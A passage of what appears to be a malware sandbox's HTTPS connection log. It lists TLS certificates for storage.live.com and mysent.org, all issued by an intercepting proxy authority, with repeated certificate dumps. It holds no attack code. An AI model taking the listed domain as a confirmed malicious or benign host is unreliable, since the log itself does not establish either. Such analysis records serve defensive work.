EE 4C 6A E2 0A 72 D9 .U.!....l.Lj..r.00A0: 27 92 C7 13 CF A1 CD FC 5B 58 0B 55 CF 4B 76 25 '.......[X.U.Kv%00B0: 50 E7 C9 32 5D DA 46 38 52 05 82 9F B9 BB B0 B4 P..2].F8R.......00C0: 83 0F 79 A5 09 70 29 9E B8 CB D5 B1 95 B5 B5 A7 ..y..p).........00D0: 07 67 FF CD 7F 7E FA A2 F2 95 DA 5C 88 6B C7 89 .g.........\.k..00E0: 51 ED 24 3C 35 44 5F 24 38 E1 1C AC 11 35 7F B3 Q.$<5D_$8....5..00F0: ED 40 04 FD B9 A3 E8 46 FB A3 74 B4 AA 55 DB 26 .@.....F..t..U.&0100: BE CB 55 CD 87 6F 78 CB ED 32 42 55 17 28 AA F0 ..U..ox..2BU.(..0110: AA FD 3D 2F 19 C8 89 51 C5 4B 4C 5C E5 E5 3A C5 ..=/...Q.KL\..:.0120: 11 05 F7 B7 D6 C4 22 EF 0F 84 C2 5C 56 80 41 8C ......"....\V.A.0130: F9 8C 8F C0 74 48 8E 23 1C 30 B5 91 D7 56 A7 AB ....tH.#.0...V..0140: C0 E6 FA 0A 51 B6 A4 70 3F EF 8D 09 F1 BC 1F 35 ....Q..p?......50150: 23 BD 34 22 2D DF 02 AC 00 8A 1F F0 05 F9 1C 9C #.4"-...........0160: 80 63 DB 48 67 AA 8D D7 4C 53 89 F0 E5 2D 36 C9 .c.Hg...LS...-6.0170: 0A D0 23 17 23 E7 D2 EC A2 B9 3B 8A CA BC 05 48 ..#.#.....;....H0180: 9E E3 FA F2 48 37 A5 78 C5 13 23 3E FD 6E 86 37 ....H7.x..#>.n.70190: 0B EC 90 F8 6D 95 57 A8 DB CE 92 70 88 E1 93 37 ....m.W....p...701A0: E9 FF 5A B2 77 95 BE D7 E6 68 4B 95 E4 B8 E3 3D ..Z.w....hK....=01B0: 34 B2 C2 6C 0C 4C 60 F7 A8 13 AD DD 7A 10 59 0D 4..l.L`.....z.Y.01C0: BD DE A7 BC F8 08 EF 31 39 57 C9 09 87 79 F0 FF .......19W...y..01D0: 73 59 74 04 07 76 C3 BC 77 2A 38 5F 7C 6A 0C 05 sYt..v..w8_.j..01E0: 5A 07 73 C5 82 FF C7 E4 4B BE A4 70 73 41 F1 85 Z.s.....K..psA..01F0: 10 24 F0 C0 79 66 A8 A2 B4 2B 92 2C 76 4A 10 D6 .$..yf...+.,vJ..]
Jun 19, 2018 13:45:37.683186054 MESZ	443	49164	204.79.197.213	192.168.1.81	CN=The Universe Security Company Ltd, O=The Universe Security Company Ltd, L=San Francisco, ST=California, C=US	CN=The Universe Security Company Ltd, O=The Universe Security Company Ltd, L=San Francisco, ST=California, C=US	Tue Mar 17 15:16:38 CET 2015	Thu Mar 09 15:16:38 CET 2045	[[ Version: V3 Subject: CN=The Universe Security Company Ltd, O=The Universe Security Company Ltd, L=San Francisco, ST=California, C=US Signature Algorithm: SHA1withRSA, OID = 1.2.840.113549.1.1.5 Key: Sun RSA public key, 4096 bits modulus: 711985641737528462479372839972075530806320878454687135557621402441443773471983019684383733615847358574518313705179519082770607436694533624743745618156175203869336045691550204932787533401608417444382184463323372400890803042896962496985368564951032185827918215530110793308055563994609721635134287633753491597904696459307342961258709601068933206070716059343344267496588496065097287396587555800103438048952756062335051161110386879649705134962707919572452053466271443117902804394353841266298811426328938232468137350602045270819058452070042121160403908201634989593020076913587028625408970178284297106872853479670009527699840932377185204726966865353888969261126960570356541235774461783847192276011392481713055449909388462592655877330944643627998488743872162899901841530186304586154119382831571359151938823433813619391602813151960998795626931670773822266565703454446525381510991535100972197508013483354479077796159124190599252481565522767162284976136483518602005625270229130196463766126566096467226584062965433872167378966965788853949377573033392624550049042721728416419615623819845197785653778939796080743152428746810511976981516667805142566846062425162330079791475167782087511471103190553207071497348640535196229924869585029049540224117309 public exponent: 65537 Validity: [From: Tue Mar 17 15:16:38 CET 2015, To: Thu Mar 09 15:16:38 CET 2045] Issuer: CN=The Universe Security Company Ltd, O=The Universe Security Company Ltd, L=San Francisco, ST=California, C=US SerialNumber: [ d21ef1f6 e34f6bb8]Certificate Extensions: 3[1]: ObjectId: 2.5.29.35 Criticality=falseAuthorityKeyIdentifier [KeyIdentifier [0000: BB 3B 3F AA 10 70 C8 55 F7 24 E9 3B FD 32 19 F4 .;?..p.U.$.;.2..0010: F6 11 6B 3A ..k:]][2]: ObjectId: 2.5.29.19 Criticality=falseBasicConstraints:[ CA:true PathLen:2147483647][3]: ObjectId: 2.5.29.14 Criticality=falseSubjectKeyIdentifier [KeyIdentifier [0000: BB 3B 3F AA 10 70 C8 55 F7 24 E9 3B FD 32 19 F4 .;?..p.U.$.;.2..0010: F6 11 6B 3A ..k:]]] Algorithm: [SHA1withRSA] Signature:0000: 48 3C 18 2B 72 E4 57 52 A8 95 35 C6 A1 73 71 20 H<.+r.WR..5..sq 0010: 85 20 94 FF 55 E7 1B 02 9C 05 C8 31 F8 85 B2 79 . ..U......1...y0020: BE B2 47 55 74 E0 55 70 6B 17 24 9F 0B 6A 92 FE ..GUt.Upk.$..j..0030: 41 04 22 4F 25 F4 5C DA 25 EF A9 32 CD CC 57 AD A."O%.\.%..2..W.0040: 88 5B 56 14 5F 7A 38 02 D3 18 23 8D A5 D8 FB 9F .[V._z8...#.....0050: 43 A3 1A 68 2E 42 06 72 26 01 A2 EB DB AF 70 2E C..h.B.r&.....p.0060: 57 12 35 7C B2 A1 EF AB 12 E0 81 55 84 37 C8 FD W.5........U.7..0070: 95 AE DE 58 60 40 52 A1 C7 75 18 A1 2F 92 5A C0 ...X`@R..u../.Z.0080: AB C9 1B A7 17 19 4E 4D D8 53 FB C6 C3 7C 33 53 ......NM.S....3S0090: 51 5B 3A 64 31 60 A4 B3 07 72 D7 39 1A F9 8A A2 Q[:d1`...r.9....00A0: 70 E4 B4 D6 BF 6A AD 24 76 74 CE C7 EA 87 3E 28 p....j.$vt....>(00B0: 6C EF 08 09 4F 79 FB CF 77 FF FA F8 77 04 4A 30 l...Oy..w...w.J000C0: 90 5B 27 11 5C 79 60 60 64 1A CB 6E 2C 5E 1C B0 .['.\y``d..n,^..00D0: 53 AC 28 4A 8B 8B DF AE 01 41 D2 12 3F 7B 22 54 S.(J.....A..?."T00E0: D2 8E 3C C4 A1 FF 4A 6C D3 1B EB 1D 35 94 14 F5 ..<...Jl....5...00F0: 79 44 BE C2 E6 93 9B BA 4D D0 81 94 E9 25 BE 43 yD......M....%.C0100: FC 2C 92 E5 CA DC 5D 9D CF CA 8B CF 0C E0 3D 29 .,....].......=)0110: 21 44 4A C0 19 F4 F3 D5 7E F5 74 35 2B FC DF A3 !DJ.......t5+...0120: F7 3C C5 D6 7A 7A 0B B6 2B C7 BF F9 8F 6E B5 56 .<..zz..+....n.V0130: 44 0F A9 45 80 9F 88 21 82 99 2C DC 85 DA 25 65 D..E...!..,...%e0140: 55 ED D3 1C 36 4E D6 63 46 68 AF 6C 87 5C C5 F6 U...6N.cFh.l.\..0150: 89 C2 E1 70 F4 87 0F F1 DE F0 8E 72 E4 CA CB 83 ...p.......r....0160: 2B CD B1 7A 54 41 AF 97 38 DF F7 EA 8C 7A B2 D1 +..zTA..8....z..0170: 1B E9 E9 D3 BF 41 0F 21 F0 AA 8D 95 B6 CD 91 90 .....A.!........0180: DF 71 E7 72 96 9D 3F 18 B9 98 8C CE 15 45 99 83 .q.r..?......E..0190: FB BD 61 4E AD 63 36 71 86 5D BD A3 17 61 6F 31 ..aN.c6q.]...ao101A0: 57 A4 25 3D ED 24 6A 9E 94 E0 D8 67 F0 17 12 86 W.%=.$j....g....01B0: B7 4E 65 93 A6 BD 8A 2A 06 6B EC 0F DE E0 B5 9C .Ne....*.k......01C0: A0 AF D5 A4 32 A2 70 75 A1 02 A9 7F 85 D9 39 38 ....2.pu......9801D0: 80 BB 41 A6 0F A3 8D 1F F1 66 E0 04 B3 A2 88 03 ..A......f......01E0: 8B A7 AF E1 A1 60 95 F6 CB 76 12 C8 51 83 1E 14 .....`...v..Q...01F0: E2 0B B5 6C F1 4B 96 21 F9 DE AA B2 CD 71 B8 63 ...l.K.!.....q.c]
Jun 19, 2018 13:45:39.461761951 MESZ	443	49165	131.253.33.213	192.168.1.81	CN=storage.live.com, OU=Microsoft Corporation, O=Microsoft Corporation, L=Redmond, ST=WA, C=US	CN=The Universe Security Company Ltd, O=The Universe Security Company Ltd, L=San Francisco, ST=California, C=US	Mon Jun 18 13:45:37 CEST 2018	Tue Jun 18 13:45:37 CEST 2019	[[ Version: V3 Subject: CN=storage.live.com, OU=Microsoft Corporation, O=Microsoft Corporation, L=Redmond, ST=WA, C=US Signature Algorithm: SHA1withRSA, OID = 1.2.840.113549.1.1.5 Key: Sun RSA public key, 1024 bits modulus: 142020255779474466437467796904587070192603484135849864218396671432172669171382101147506485794532471675983194620816678789045464137277686040346151440959121771884847900060007644867320878394553783339343758343135223291298085891647948350326926758635437768025453782370586416571958435585772964422012691370552485683107 public exponent: 3 Validity: [From: Mon Jun 18 13:45:37 CEST 2018, To: Tue Jun 18 13:45:37 CEST 2019] Issuer: CN=The Universe Security Company Ltd, O=The Universe Security Company Ltd, L=San Francisco, ST=California, C=US SerialNumber: [ 2d0000dc e8c7b49d 601dc803 be0000de 89d114]Certificate Extensions: 6[1]: ObjectId: 2.5.29.35 Criticality=falseAuthorityKeyIdentifier [KeyIdentifier [0000: BB 3B 3F AA 10 70 C8 55 F7 24 E9 3B FD 32 19 F4 .;?..p.U.$.;.2..0010: F6 11 6B 3A ..k:][CN=The Universe Security Company Ltd, O=The Universe Security Company Ltd, L=San Francisco, ST=California, C=US]SerialNumber: [ d21ef1f6 e34f6bb8]][2]: ObjectId: 2.5.29.19 Criticality=falseBasicConstraints:[ CA:false PathLen: undefined][3]: ObjectId: 2.5.29.37 Criticality=falseExtendedKeyUsages [ serverAuth][4]: ObjectId: 2.5.29.15 Criticality=falseKeyUsage [ DigitalSignature Key_Encipherment][5]: ObjectId: 2.5.29.17 Criticality=falseSubjectAlternativeName [ DNSName: l-df.live.net DNSName: l.live.net DNSName: api.live.com DNSName: api.live.net DNSName: docs.live.net DNSName: skyapi.live.net DNSName: api-df.live.com DNSName: api-df.live.net DNSName: docs-df.live.net DNSName: skyapi-df.live.net DNSName: .ra.live.com DNSName: .cobalt.df.storage.msn.com DNSName: .cobalt.df.storage.live.com DNSName: .cobalt.storage.msn.com DNSName: .df.storage.live.com DNSName: .df.storage.msn.com DNSName: .docs-df.live.net DNSName: .storage.live.com DNSName: .storage.msn.com DNSName: .users.df.storage.live.com DNSName: .users.df.storage.msn.com DNSName: .users.storage.live.com DNSName: .users.storage.msn.com DNSName: .df.policies.live.net DNSName: df.policies.live.net DNSName: .df.settings.live.net DNSName: df.settings.live.net DNSName: .df.livefilestore.com DNSName: apis.live.net DNSName: .apis.live.net DNSName: .bay.livefilestore.com DNSName: .livefilestore.com DNSName: ssw.live-int.com DNSName: ssw.live.com DNSName: df.storage.live.com DNSName: .sn2.df.livefilestore.com DNSName: storage.live.com DNSName: .blu.livefilestore.com DNSName: .bn1.livefilestore.com DNSName: .cobalt.storage.live.com DNSName: .dm1.livefilestore.com DNSName: .docs.live.net DNSName: .policies.live.net DNSName: .settings.live.net DNSName: .sn2.livefilestore.com DNSName: .tuk.livefilestore.com DNSName: policies.live.net DNSName: storage.msn.com DNSName: dev.live.com DNSName: oauth.live.com DNSName: .bn1301.livefilestore.com DNSName: .bn1302.livefilestore.com DNSName: .dm2301.livefilestore.com DNSName: .dm2302.livefilestore.com DNSName: skyapi.skydrive.live.com DNSName: settings.live.net DNSName: .bn1303.livefilestore.com DNSName: .bn1304.livefilestore.com DNSName: .dm2303.livefilestore.com DNSName: .dm2304.livefilestore.com DNSName: .by3301.livefilestore.com DNSName: .by3302.livefilestore.com DNSName: .snt002.df.livefilestore.com DNSName: .bn1303.df.livefilestore.com DNSName: .dm2303.df.livefilestore.com DNSName: skyapi.newdrive.live.com DNSName: skyapi.onedrive.live.com DNSName: .files.1drv.com DNSName: .bl3301.livefilestore.com DNSName: .bl3302.livefilestore.com DNSName: .bn1391soak2.livefilestore.com DNSName: .dm2391soak2.livefilestore.com DNSName: .bn1391soak3.livefilestore.com DNSName: .dm2391soak3.livefilestore.com DNSName: .files-df.1drv.com DNSName: .api.onedrive.com DNSName: df.api.onedrive.com DNSName: .df.api.onedrive.com DNSName: .s2s-storage.live.com DNSName: .s2s-policies.live.net DNSName: s2s-policies.live.net DNSName: s2s-settings.live.net DNSName: .s2s-settings.live.net DNSName: .config.live.net DNSName: config.live.net DNSName: register.mesh.com DNSName: .df.s2s-storage.live.com DNSName: .df.s2s-settings.live.net DNSName: df.s2s-settings.live.net DNSName: s2s-storage.live.com DNSName: df.s2s-storage.live.com DNSName: .s2s.livefilestore.com DNSName: .s2s.df.livefilestore.com DNSName: .s2s-files-df.1drv.com DNSName: .df.s2s-policies.live.net DNSName: df.s2s-policies.live.net DNSName: .df-config.live.net DNSName: df-config.live.net DNSName: .s2s-files.1drv.com DNSName: device.ra.live.com DNSName: mesh.com DNSName: .keymaster.p001.1drv.com DNSName: .keymaster.i001.1drv.com DNSName: s2s-skyapi.live.net DNSName: s2s-api.onedrive.com DNSName: .s2s-api.onedrive.com DNSName: s2s-skyapi-df.live.net DNSName: df.s2s-api.onedrive.com DNSName: .df.s2s-api.onedrive.com DNSName: df.people.onedrive.com DNSName: .slps.live.net DNSName: .ADMINSVC.P001.1drv.com DNSName: .ADMINSVC.I001.1drv.com DNSName: .CONFIG.I001.1drv.com DNSName: .DEPLOYMGR.P001.1drv.com DNSName: .JOB.P001.1drv.com DNSName: .CAMP.I001.1drv.com DNSName: .1drv.com DNSName: 1drv.ms DNSName: .LPS.I001.1drv.com DNSName: .WSTCRS.I001.1drv.com DNSName: .wstlm.1drv.com DNSName: sdrv.ms DNSName: .am.files.1drv.com DNSName: .db.files.1drv.com DNSName: .bl.files.1drv.com DNSName: .bn.files.1drv.com DNSName: .by.files.1drv.com DNSName: .ch.files.1drv.com DNSName: .cy.files.1drv.com DNSName: .dm.files.1drv.com DNSName: .sn.files.1drv.com DNSName: d.bl3301.docs.live.net DNSName: d.bl3302.docs.live.net DNSName: .onedrive.com][6]: ObjectId: 2.5.29.14 Criticality=falseSubjectKeyIdentifier [KeyIdentifier [0000: 5A 89 04 CE 12 04 DE C7 1A B6 37 7E 0B 52 41 EA Z.........7..RA.0010: D0 D3 87 A7 ....]]] Algorithm: [SHA1withRSA] Signature:0000: 91 E7 4A C1 44 1F D0 AC AF 2C A4 49 24 C4 FF 9C ..J.D....,.I$...0010: 53 4E D8 D0 3E EF C7 D5 0B E9 A3 C9 D7 AF 63 5A SN..>.........cZ0020: 43 8D 9C 32 2B 76 BF BD 45 8D B9 7C DC 9D 4D 3A C..2+v..E.....M:0030: A8 37 01 4F E5 09 87 4F E9 E6 24 9A E9 5C CD A0 .7.O...O..$..\..0040: E2 79 E2 11 87 66 B0 E3 E8 35 35 BC D8 12 CC 26 .y...f...55....&0050: 04 41 D4 63 B5 A3 69 83 0C 52 13 40 81 E0 6E A7 .A.c..i..R.@..n.0060: A6 30 7B 89 A3 B4 59 89 75 0C 54 E3 76 0F 76 62 .0....Y.u.T.v.vb0070: 6F 70 5D 3E 06 64 4B 74 E3 AD 69 C3 EF 5D 9D D5 op]>.dKt..i..]..0080: 68 B1 75 CC 4F C2 88 B8 09 76 2F 36 61 17 2C 46 h.u.O....v/6a.,F0090: 16 55 F8 21 C8 EB E6 C0 6C EE 4C 6A E2 0A 72 D9 .U.!....l.Lj..r.00A0: 27 92 C7 13 CF A1 CD FC 5B 58 0B 55 CF 4B 76 25 '.......[X.U.Kv%00B0: 50 E7 C9 32 5D DA 46 38 52 05 82 9F B9 BB B0 B4 P..2].F8R.......00C0: 83 0F 79 A5 09 70 29 9E B8 CB D5 B1 95 B5 B5 A7 ..y..p).........00D0: 07 67 FF CD 7F 7E FA A2 F2 95 DA 5C 88 6B C7 89 .g.........\.k..00E0: 51 ED 24 3C 35 44 5F 24 38 E1 1C AC 11 35 7F B3 Q.$<5D_$8....5..00F0: ED 40 04 FD B9 A3 E8 46 FB A3 74 B4 AA 55 DB 26 .@.....F..t..U.&0100: BE CB 55 CD 87 6F 78 CB ED 32 42 55 17 28 AA F0 ..U..ox..2BU.(..0110: AA FD 3D 2F 19 C8 89 51 C5 4B 4C 5C E5 E5 3A C5 ..=/...Q.KL\..:.0120: 11 05 F7 B7 D6 C4 22 EF 0F 84 C2 5C 56 80 41 8C ......"....\V.A.0130: F9 8C 8F C0 74 48 8E 23 1C 30 B5 91 D7 56 A7 AB ....tH.#.0...V..0140: C0 E6 FA 0A 51 B6 A4 70 3F EF 8D 09 F1 BC 1F 35 ....Q..p?......50150: 23 BD 34 22 2D DF 02 AC 00 8A 1F F0 05 F9 1C 9C #.4"-...........0160: 80 63 DB 48 67 AA 8D D7 4C 53 89 F0 E5 2D 36 C9 .c.Hg...LS...-6.0170: 0A D0 23 17 23 E7 D2 EC A2 B9 3B 8A CA BC 05 48 ..#.#.....;....H0180: 9E E3 FA F2 48 37 A5 78 C5 13 23 3E FD 6E 86 37 ....H7.x..#>.n.70190: 0B EC 90 F8 6D 95 57 A8 DB CE 92 70 88 E1 93 37 ....m.W....p...701A0: E9 FF 5A B2 77 95 BE D7 E6 68 4B 95 E4 B8 E3 3D ..Z.w....hK....=01B0: 34 B2 C2 6C 0C 4C 60 F7 A8 13 AD DD 7A 10 59 0D 4..l.L`.....z.Y.01C0: BD DE A7 BC F8 08 EF 31 39 57 C9 09 87 79 F0 FF .......19W...y..01D0: 73 59 74 04 07 76 C3 BC 77 2A 38 5F 7C 6A 0C 05 sYt..v..w8_.j..01E0: 5A 07 73 C5 82 FF C7 E4 4B BE A4 70 73 41 F1 85 Z.s.....K..psA..01F0: 10 24 F0 C0 79 66 A8 A2 B4 2B 92 2C 76 4A 10 D6 .$..yf...+.,vJ..]
Jun 19, 2018 13:45:39.461761951 MESZ	443	49165	131.253.33.213	192.168.1.81	CN=The Universe Security Company Ltd, O=The Universe Security Company Ltd, L=San Francisco, ST=California, C=US	CN=The Universe Security Company Ltd, O=The Universe Security Company Ltd, L=San Francisco, ST=California, C=US	Tue Mar 17 15:16:38 CET 2015	Thu Mar 09 15:16:38 CET 2045	[[ Version: V3 Subject: CN=The Universe Security Company Ltd, O=The Universe Security Company Ltd, L=San Francisco, ST=California, C=US Signature Algorithm: SHA1withRSA, OID = 1.2.840.113549.1.1.5 Key: Sun RSA public key, 4096 bits modulus: 711985641737528462479372839972075530806320878454687135557621402441443773471983019684383733615847358574518313705179519082770607436694533624743745618156175203869336045691550204932787533401608417444382184463323372400890803042896962496985368564951032185827918215530110793308055563994609721635134287633753491597904696459307342961258709601068933206070716059343344267496588496065097287396587555800103438048952756062335051161110386879649705134962707919572452053466271443117902804394353841266298811426328938232468137350602045270819058452070042121160403908201634989593020076913587028625408970178284297106872853479670009527699840932377185204726966865353888969261126960570356541235774461783847192276011392481713055449909388462592655877330944643627998488743872162899901841530186304586154119382831571359151938823433813619391602813151960998795626931670773822266565703454446525381510991535100972197508013483354479077796159124190599252481565522767162284976136483518602005625270229130196463766126566096467226584062965433872167378966965788853949377573033392624550049042721728416419615623819845197785653778939796080743152428746810511976981516667805142566846062425162330079791475167782087511471103190553207071497348640535196229924869585029049540224117309 public exponent: 65537 Validity: [From: Tue Mar 17 15:16:38 CET 2015, To: Thu Mar 09 15:16:38 CET 2045] Issuer: CN=The Universe Security Company Ltd, O=The Universe Security Company Ltd, L=San Francisco, ST=California, C=US SerialNumber: [ d21ef1f6 e34f6bb8]Certificate Extensions: 3[1]: ObjectId: 2.5.29.35 Criticality=falseAuthorityKeyIdentifier [KeyIdentifier [0000: BB 3B 3F AA 10 70 C8 55 F7 24 E9 3B FD 32 19 F4 .;?..p.U.$.;.2..0010: F6 11 6B 3A ..k:]][2]: ObjectId: 2.5.29.19 Criticality=falseBasicConstraints:[ CA:true PathLen:2147483647][3]: ObjectId: 2.5.29.14 Criticality=falseSubjectKeyIdentifier [KeyIdentifier [0000: BB 3B 3F AA 10 70 C8 55 F7 24 E9 3B FD 32 19 F4 .;?..p.U.$.;.2..0010: F6 11 6B 3A ..k:]]] Algorithm: [SHA1withRSA] Signature:0000: 48 3C 18 2B 72 E4 57 52 A8 95 35 C6 A1 73 71 20 H<.+r.WR..5..sq 0010: 85 20 94 FF 55 E7 1B 02 9C 05 C8 31 F8 85 B2 79 . ..U......1...y0020: BE B2 47 55 74 E0 55 70 6B 17 24 9F 0B 6A 92 FE ..GUt.Upk.$..j..0030: 41 04 22 4F 25 F4 5C DA 25 EF A9 32 CD CC 57 AD A."O%.\.%..2..W.0040: 88 5B 56 14 5F 7A 38 02 D3 18 23 8D A5 D8 FB 9F .[V._z8...#.....0050: 43 A3 1A 68 2E 42 06 72 26 01 A2 EB DB AF 70 2E C..h.B.r&.....p.0060: 57 12 35 7C B2 A1 EF AB 12 E0 81 55 84 37 C8 FD W.5........U.7..0070: 95 AE DE 58 60 40 52 A1 C7 75 18 A1 2F 92 5A C0 ...X`@R..u../.Z.0080: AB C9 1B A7 17 19 4E 4D D8 53 FB C6 C3 7C 33 53 ......NM.S....3S0090: 51 5B 3A 64 31 60 A4 B3 07 72 D7 39 1A F9 8A A2 Q[:d1`...r.9....00A0: 70 E4 B4 D6 BF 6A AD 24 76 74 CE C7 EA 87 3E 28 p....j.$vt....>(00B0: 6C EF 08 09 4F 79 FB CF 77 FF FA F8 77 04 4A 30 l...Oy..w...w.J000C0: 90 5B 27 11 5C 79 60 60 64 1A CB 6E 2C 5E 1C B0 .['.\y``d..n,^..00D0: 53 AC 28 4A 8B 8B DF AE 01 41 D2 12 3F 7B 22 54 S.(J.....A..?."T00E0: D2 8E 3C C4 A1 FF 4A 6C D3 1B EB 1D 35 94 14 F5 ..<...Jl....5...00F0: 79 44 BE C2 E6 93 9B BA 4D D0 81 94 E9 25 BE 43 yD......M....%.C0100: FC 2C 92 E5 CA DC 5D 9D CF CA 8B CF 0C E0 3D 29 .,....].......=)0110: 21 44 4A C0 19 F4 F3 D5 7E F5 74 35 2B FC DF A3 !DJ.......t5+...0120: F7 3C C5 D6 7A 7A 0B B6 2B C7 BF F9 8F 6E B5 56 .<..zz..+....n.V0130: 44 0F A9 45 80 9F 88 21 82 99 2C DC 85 DA 25 65 D..E...!..,...%e0140: 55 ED D3 1C 36 4E D6 63 46 68 AF 6C 87 5C C5 F6 U...6N.cFh.l.\..0150: 89 C2 E1 70 F4 87 0F F1 DE F0 8E 72 E4 CA CB 83 ...p.......r....0160: 2B CD B1 7A 54 41 AF 97 38 DF F7 EA 8C 7A B2 D1 +..zTA..8....z..0170: 1B E9 E9 D3 BF 41 0F 21 F0 AA 8D 95 B6 CD 91 90 .....A.!........0180: DF 71 E7 72 96 9D 3F 18 B9 98 8C CE 15 45 99 83 .q.r..?......E..0190: FB BD 61 4E AD 63 36 71 86 5D BD A3 17 61 6F 31 ..aN.c6q.]...ao101A0: 57 A4 25 3D ED 24 6A 9E 94 E0 D8 67 F0 17 12 86 W.%=.$j....g....01B0: B7 4E 65 93 A6 BD 8A 2A 06 6B EC 0F DE E0 B5 9C .Ne....*.k......01C0: A0 AF D5 A4 32 A2 70 75 A1 02 A9 7F 85 D9 39 38 ....2.pu......9801D0: 80 BB 41 A6 0F A3 8D 1F F1 66 E0 04 B3 A2 88 03 ..A......f......01E0: 8B A7 AF E1 A1 60 95 F6 CB 76 12 C8 51 83 1E 14 .....`...v..Q...01F0: E2 0B B5 6C F1 4B 96 21 F9 DE AA B2 CD 71 B8 63 ...l.K.!.....q.c]
Jun 19, 2018 13:45:46.606036901 MESZ	443	49169	188.241.39.220	192.168.1.81	CN=mysent.org	CN=The Universe Security Company Ltd, O=The Universe Security Company Ltd, L=San Francisco, ST=California, C=US	Mon Jun 18 13:45:26 CEST 2018	Tue Jun 18 13:45:26 CEST 2019	[[ Version: V3 Subject: CN=mysent.org Signature Algorithm: SHA1withRSA, OID = 1.2.840.113549.1.1.5 Key: Sun RSA public key, 1024 bits modulus: 142020255779474466437467796904587070192603484135849864218396671432172669171382101147506485794532471675983194620816678789045464137277686040346151440959121771884847900060007644867320878394553783339343758343135223291298085891647948350326926758635437768025453782370586416571958435585772964422012691370552485683107 public exponent: 3 Validity: [From: Mon Jun 18 13:45:26 CEST 2018, To: Tue Jun 18 13:45:26 CEST 2019] Issuer: CN=The Universe Security Company Ltd, O=The Universe Security Company Ltd, L=San Francisco, ST=California, C=US SerialNumber: [ 6d600d30 8e6e07f7 682b6b12 4c42ab40]Certificate Extensions: 6[1]: ObjectId: 2.5.29.35 Criticality=falseAuthorityKeyIdentifier [KeyIdentifier [0000: BB 3B 3F AA 10 70 C8 55 F7 24 E9 3B FD 32 19 F4 .;?..p.U.$.;.2..0010: F6 11 6B 3A ..k:][CN=The Universe Security Company Ltd, O=The Universe Security Company Ltd, L=San Francisco, ST=California, C=US]SerialNumber: [ d21ef1f6 e34f6bb8]][2]: ObjectId: 2.5.29.19 Criticality=falseBasicConstraints:[ CA:false PathLen: undefined][3]: ObjectId: 2.5.29.37 Criticality=falseExtendedKeyUsages [ serverAuth][4]: ObjectId: 2.5.29.15 Criticality=falseKeyUsage [ DigitalSignature Key_Encipherment][5]: ObjectId: 2.5.29.17 Criticality=falseSubjectAlternativeName [ DNSName: mysent.org][6]: ObjectId: 2.5.29.14 Criticality=falseSubjectKeyIdentifier [KeyIdentifier [0000: 5A 89 04 CE 12 04 DE C7 1A B6 37 7E 0B 52 41 EA Z.........7..RA.0010: D0 D3 87 A7 ....]]] Algorithm: [SHA1withRSA] Signature:0000: 34 C7 4A 88 4C 24 5D 55 3C 06 A7 18 76 FB B2 E6 4.J.L$]U<...v...0010: 3E 18 40 EE 23 26 4B 75 33 21 CD 5C EA 0D 57 47 >.@.#&Ku3!.\..WG0020: D5 14 4B 4F BE 04 73 8C D1 5A 70 3E D6 D1 D5 FD ..KO..s..Zp>....0030: 7E ED 32 14 2E 21 36 23 DF 41 79 06 64 A4 2F 1D ..2..!6#.Ay.d./.0040: 41 0F A1 42 18 B2 74 26 70 BF 4B 6C F4 B8 B9 24 A..B..t&p.Kl...$0050: 7E 8C FB 80 08 19 3F EF 07 0C A9 CF 35 86 47 63 ......?.....5.Gc0060: DB EB 11 8B 31 72 D9 6F 28 59 62 A5 B1 CB B5 9D ....1r.o(Yb.....0070: 11 DB 34 1F A9 25 DB 9F 6F 3E 84 A7 4E 12 C7 CF ..4..%..o>..N...0080: 57 B4 D2 AB B1 58 98 7A 35 9C 4C 20 94 ED 9D 42 W....X.z5.L ...B0090: D9 DE DD FA BE 7E 65 C7 F1 69 A4 27 AE 0F 77 87 ......e..i.'..w.00A0: C1 77 D5 87 A3 49 02 D0 B2 C8 99 80 FB 58 5C 21 .w...I.......X\!00B0: 68 2A 01 7A 8D D5 70 AD 90 4D 98 EC C4 08 EF 5A h.z..p..M.....Z00C0: 96 4B 4D 43 D9 2E 76 9D 57 9B B0 E2 ED 28 50 D2 .KMC..v.W....(P.00D0: 67 42 3F FA 4C D0 AF BD 3F 27 BB C0 37 8A 9C 05 gB?.L...?'..7...00E0: 92 E9 9C F7 FE ED 52 AE 1A CA 53 32 8E BC 12 97 ......R...S2....00F0: 98 AC 6F 63 EC 09 0C 28 3D 83 CB 76 D7 92 85 30 ..oc...(=..v...00100: B0 F8 36 E7 0D 31 CC F1 E7 F2 6C 8F EE 8D F7 A0 ..6..1....l.....0110: 49 C4 83 1B 7A 27 B2 DC 32 3C B1 8F 66 BC BB 4F I...z'..2<..f..O0120: 35 3A 65 7D CE FD C6 95 5B A0 B9 63 41 3C 84 6E 5:e.....[..cA<.n0130: 59 6D A4 D3 E0 EF C1 77 F8 4A BA CA DF 65 BD FE Ym.....w.J...e..0140: C5 2A 1D 69 38 94 02 D6 B5 74 B6 3C 5F 7B 24 30 ..i8....t.<_.$00150: 2F B9 35 83 DC C8 27 52 7A DC 47 C0 01 97 BE 33 /.5...'Rz.G....30160: 60 F6 F4 3C 1D 61 49 D8 70 D3 01 2B 36 16 7B C3 `..<.aI.p..+6...0170: F1 B1 29 A8 AF 44 5A C2 B5 34 B1 20 E7 45 DE EC ..)..DZ..4. .E..0180: 0B 92 70 CE F0 A0 3B 96 C4 D7 A7 4A 81 13 FA 51 ..p...;....J...Q0190: 97 DC 7F B7 5C 4F 38 89 2A CB EF 71 64 29 23 D8 ....\O8.*..qd)#.01A0: 68 FC 51 11 A8 95 3B 00 60 96 70 D0 37 57 EC 3D h.Q...;.`.p.7W.=01B0: 00 48 14 96 DC 1B BF 59 7D 79 C0 27 38 35 FA F1 .H.....Y.y.'85..01C0: D3 2D 08 6F 24 3E F6 1E 7B C1 83 88 64 42 80 0F .-.o$>......dB..01D0: 43 EE 26 1E A5 3C A6 38 07 EA 0C 04 0D 82 A1 72 C.&..<.8.......r01E0: F3 2F DF EA D5 4D BB 82 0A FE 10 88 24 DA 86 6A ./...M......$..j01F0: 4D 0F A0 E0 BF E4 11 DC C1 8B C4 18 1A 10 88 AE M...............]
